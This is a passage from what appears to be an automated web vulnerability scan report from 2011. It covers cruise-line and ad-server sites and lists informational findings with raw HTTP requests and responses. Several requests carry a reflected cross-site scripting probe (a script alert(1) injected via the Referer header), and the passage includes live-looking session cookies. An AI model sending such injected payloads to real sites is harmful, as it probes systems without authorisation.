Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 55571
Date: Mon, 03 Oct 2011 12:51:49 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


My NCL</
...[SNIP]...
23.11. https://www2.ncl.com/files/json/promo.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /files/json/promo.json

Request

GET /files/json/promo.json HTTP/1.1
Host: www2.ncl.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www2.ncl.com/vacationsf6ac7%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec7ba114d195
Cookie: Cookie=R1788641230; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_sess=%20s_cc%3Dtrue%3B%20c%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1317648231558-New%7C1320240231558%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 03 Oct 2011 13:01:02 GMT
ETag: "b7d752-12-4ae6491261f80"
Accept-Ranges: bytes
X-Ncl-SLog: (null)
Content-Length: 18
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1798
Expires: Mon, 03 Oct 2011 13:53:26 GMT
Date: Mon, 03 Oct 2011 13:23:28 GMT
Connection: keep-alive
Vary: Accept-Encoding

{ "result": [ ] }
23.12. https://www2.ncl.com/files/json/query_all.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /files/json/query_all.json

Request

GET /files/json/query_all.json HTTP/1.1
Host: www2.ncl.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www2.ncl.com/vacationsf6ac7%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec7ba114d195
Cookie: Cookie=R1788641230; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_sess=%20s_cc%3Dtrue%3B%20c%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1317648231558-New%7C1320240231558%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 03 Oct 2011 13:10:18 GMT
ETag: "b7b821-5e22-4ae64b24a0280"
Accept-Ranges: bytes
X-Ncl-SLog: (null)
Content-Length: 24098
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1755
Expires: Mon, 03 Oct 2011 13:52:43 GMT
Date: Mon, 03 Oct 2011 13:23:28 GMT
Connection: keep-alive
Vary: Accept-Encoding

{"AggrRecords":[{"RecordCount":"2","RecordSpec":"18214_BESTFARE_0","AggRecDetailLink":"N=&Nr=AND%28p_Record_Type%3AI%2Cp_Fare_Code%3ABF%29&Nu=p_Itinerary_Code","DerivedProperties":{"p_Spa_Amt":"","p_I
...[SNIP]...
24. HTML does not specify charset  previous  next
There are 31 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

24.1. http://b3.mookie1.com/2/B3DM/DLX/1@x92  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x92

Request

GET /2/B3DM/DLX/1@x92 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3219
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...
24.2. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1009225881@x96

Request

GET /2/RoyalCaribbean/ZAP/1009225881@x96?_RM_HTML_title_=Cruise%20Deals%20%26%20Cruise%20Vacations%20-%20Royal%20Caribbean%20International%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/home.do&_RM_HTML_referrer_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18883
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
24.3. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1090617097@x96

Request

GET /2/RoyalCaribbean/ZAP/1090617097@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18883
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
24.4. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1154839602@x96

Request

GET /2/RoyalCaribbean/ZAP/1154839602@x96?_RM_HTML_title_=Hot%20Deals%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/dealsandmore/hotdeals.do%3FcS%3DNAVBAR%26pnav%3D3%26snav%3D1&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18884
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
24.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1413416439@x96

Request

GET /2/RoyalCaribbean/ZAP/1413416439@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18884
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
24.6. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1795641562@x96

Request

GET /2/RoyalCaribbean/ZAP/1795641562@x96?_RM_HTML_title_=Prepare%20For%20Your%20Cruise%20Before%20You%20Board%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/home.do HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18884
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
24.7. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3

Request

GET /2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=1740393;type=royal441;cat=rccom004;ord=5875754996668.548?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 413
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure/L49/116970622/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b364a72
...[SNIP]...
24.8. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3

Request

GET /2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:05 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 408
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure/L20/1521504756/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b364a7257454
...[SNIP]...
24.9. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Request

GET /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 318
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/beforeyouboard/home.do/1613659149/x95/default/empty.gif/4d686437616b364a72577341437a4175?x" target="_top"><IMG SRC="http://
...[SNIP]...
24.10. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Request

GET /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 320
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/dealsandmore/hotdeals.do/1266214512/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top"><IMG SRC="http:
...[SNIP]...
24.11. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/home.do/6905219797@x95

Request

GET /2/royalcaribbean.com/home.do/6905219797@x95?_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:05 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 302
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/home.do/695110522/x95/default/empty.gif/4d686437616b364a7257454142786c49?x" target="_top"><IMG SRC="http://imagen04.247real
...[SNIP]...
24.12. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Request

GET /2/royalcaribbean.com/search/processSearch.do/4350521243@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do/1971271866/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top"><IMG SRC="http:/
...[SNIP]...
24.13. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Request

GET /2/royalcaribbean.com/search/processSearch.do/9110333970@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do/1017237109/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top"><IMG SRC="http:/
...[SNIP]...
24.14. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1740393;type=royal441;cat=rccom004;ord=5875754996668.548? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 12:41:02 GMT
Expires: Mon, 03 Oct 2011 12:41:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1328
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script>document.wri
...[SNIP]...
24.15. http://hiltonworldwide.hilton.com/en/ww/ourbestrates/claimform.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hiltonworldwide.hilton.com
Path:   /en/ww/ourbestrates/claimform.jhtml

Request

GET /en/ww/ourbestrates/claimform.jhtml;jsessionid=MXIWSVWTPN352CSGBJC222Q?xch=1041820087,C16BADB2FE2A22CE7D8F31B09490D8B4.etc64& HTTP/1.1
Host: hiltonworldwide.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
